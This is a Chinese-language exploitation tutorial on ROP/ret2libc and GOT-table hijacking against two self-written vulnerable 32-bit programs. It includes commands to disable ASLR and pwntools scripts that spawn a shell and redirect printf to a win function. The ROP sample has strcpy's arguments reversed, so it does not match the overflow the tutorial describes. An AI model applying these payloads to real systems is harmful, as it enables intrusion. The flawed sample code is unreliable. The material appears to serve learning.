0x00 前言&准备工作
该篇是基于前一篇的基础之上所做的研究。上一篇中,因为程序没有system所以导致需要我们构造自己的shellcode,但是前提是栈可执行,该篇研究的是在栈不可执行的情况下如何获取shell
准备工作还是上一篇差不多,先关闭操作系统的地址空间随机化(ASLR),这是针对栈溢出漏洞被操作系统广泛采用的防御措施。关闭该防御来降低学习复现的难度。需要root执行。
# 注意,下面是临时修改方案,系统重启后会被重置为2
echo 0 > /proc/sys/kernel/randomize_va_space
随手写一个作为测试使用(pwn_rop)
//这个作为ROP绕过复现源码
#include<stdio.h>
#include<string.h>
int main(int argc,char* argv[])
{
char buf[128];
strcpy(argv[1],buf);
puts(buf);
return 0;
}
编译成32位的程序,这次只关闭栈保护不打开栈的可执行(坑:这里必须使用gcc)
gcc -g -m32 -O0 -fno-stack-protector [源文件名] -o [可执行文件名]
参数说明:
- -g:在可执行文件中加入源码信息(gdb必要条件)
- -O0:关闭所有优化
- -m32:使用32位编译
- -fno-stack-protector:关闭栈保护
- -z execstack:启用栈上代码可执行
再另一个got_hacking,选自长亭科技相关分享,因为是一个特别典型和简单的got_hacking,非常适合入门
//劫持got表复现源码
#include <stdio.h>
#include <stdlib.h>
void win()
{
puts("You Win!");
}
void main()
{
unsigned int addr, value;
scanf("%x=%x", &addr, &value);
*(unsigned int *)addr = value;
printf("set %x=%x\n", addr, value);
}
编译命令
clang -m32 *.c -o pwn_got_hack
文件命名无所谓,可以看到并未添加-z relro -z now(完全关闭)编译参数,这就为GOT表劫持提供了可能。
0x10 ROP绕过栈攻击
0x11 什么是ROP
在前一篇中,是通过利用栈溢出漏洞,将一段自行构造的shellcode放置在栈上特定位置,并使得函数的返回值跳转到该段代码的地址执行,从而获得shell。但是这要求可以在栈上执行代码,现在栈上可执行代码被关闭了,这就要求我们要想办法跳转到可以执行代码的地方。我们看到程序引用了libc库的函数(两句include语句),libc库中显然包含有system函数,那么我们将可以把函数返回的地址指向libc中的system地址,从而跳转到库函数去执行。这种使用函数返回地址(ret指令)连接代码的技术,就叫做ROP(Return-Oriented Programming,返回导向编程)。
ROP特性:甚至可以通过在栈上布置一系列内存地址,每个内存地址布置一个gadget(以ret/jmp/call等指令结尾的一段汇编指令),从而实现程序的依次执行。另外很重要的一点是,我们在栈上写入的都是内存地址,并非需要执行的代码,使得这种方式可以有效的绕过NX保护。
0x12 攻击思路
我们需要如下计算步骤:
- 找出buf变量地址。
- 找出main函数返回地址。
- 计算面函数返回地址与buf变量地址2者的偏移量,用于填充padding。
上述三步与前一篇一致 - 找出libc中system函数、"/bin/sh"地址。
- padding后填充addr(system) + 4位任意地址 + addr(/bin/sh)
思路明确,我们现在开始来逐步调试。前面3步的过程与第三节相同,并且前面两步的目的就是为了第三步计算偏移,所以可以使用cyclic快速找到
当前需要来调试libc中地址获取,这里直接使程序溢出,然后程序程序就会异常然后中断,才能搜到 /bin/sh
gdb -q -args ./pwn_rop $(python3 -c "print('a'*200)")
gdb-peda$ starti
gdb-peda$ r
得到system的地址为:0xf7e0b370,"/bin/sh"字符的地址为:0xF7F55363。于是我们构造payload为:
"a" * 136 + "0xf7e0b370" + "\1\1\1\1" + "0xF7F55363"
gdb -q -args ./pwn_rop $(python3 -c "print('a'*136+'\x70\xb3\xe0\xf7'+'\1\1\1\1'+'\x63\x53\xf5\xf7')")
0x13 pwntools实现
from pwn import *
context.log_level = "debug" #show debug information
offset = 136
system_addr = 0xf7e0b370
binsh_addr = 0xF7F55363
payload = b'a' * offset + p32(system_addr) + b'\1\1\1\1' + p32(binsh_addr)
p = process(argv = ['./pwn_rop',payload])
print(payload)
p.interactive()
0x20 GOT表劫持
关于劫持got表技术,在第二篇中有提到,这里详细研究一下。
0x21 GOT表介绍
知识点1
-
got中存放的是外部全局变量的GOT表,例如
stdin/stdout/stderr,非延时绑定。 -
got.plt中存放的是外部函数的GOT表,例如
printf函数,延时绑定。
知识点2
GOT劫持2大要素:GOT表可写(checksec显示RELRO/disabled且Flg标志位显示为WA)与内存漏洞。
0x22 GOT表劫持核心思想
GOT表劫持的核心目的是通过修改GOT表中的函数地址为其他我们期望的地址,从而达到执行该函数时,通过跳转到GOT表,从而跳转到我们修改过的地址去执行指令。
0x23 Got查看方法
-
查看got表是否可写
readelf -S [program]
-
查看got表中的函数地址
odjdump -R [program] -
pwntools中查看(这里在第二篇中有提到)
hex(elf.got["printf"])
0x24 程序分析
- 程序的目的是为了执行win函数,但是从main函数中并无入口调用win函数,所以我们需要想办法控制指令跳转到win函数的地址执行。
- scanf("%x=%x", &addr, &value); — 以16进制按{}={}的格式读入2个数,分别写入addr和value。
- (unsigned int )addr = value; — 关键语句:
(unsigned int )addr — 将addr强制转化为指针类型,此时(unsigned int )addr表示的是内存地址addr
(unsigned int )addr = value; — 将内存地址addr处的内容改写为value
所以这里存在4字节=32bit的任意内存写入漏洞。
0x25 攻击思路
-
读取win函数的地址。
# 读取办法1:gdb中打印 gdb-peda$ p win # 外部读取 objdump -d pwn_got_hack|grep win
-
从got表中读取printf函数的地址。
objdump -R pwn_got_hack
objdump工具:
objdump是linux反汇编指令。 -d(disassemble): 可以显示反汇编后的汇编代码。 -R(dynamic-reloc): 显示文件的动态重定位入口,可以用于查找libc等共享库。 -
输入时利用内存泄露漏洞将printf函数的地址指向win函数。
# 输入addr(printf)=addr(win),注意这里的地址不同环境不同 0x0804c00c=0x80491a0显示win。
0x26 pwntools实现
from pwn import *
context.log_level = "debug" #show debug information
p = process("./pwn_got_hack")
elf = ELF("./pwn_got_hack")
# 获取win函数地址
win_addr = hex(elf.symbols['win'])
# 从got表中获取printf函数地址
printf_got = hex(elf.got['printf'])
print ("win_addr: {}".format(win_addr))
print ("printf_got: {}".format(printf_got))
payload = printf_got + "=" + win_addr
print ("payload: {}".format(payload))
p.sendline(payload)
print(p.recvall())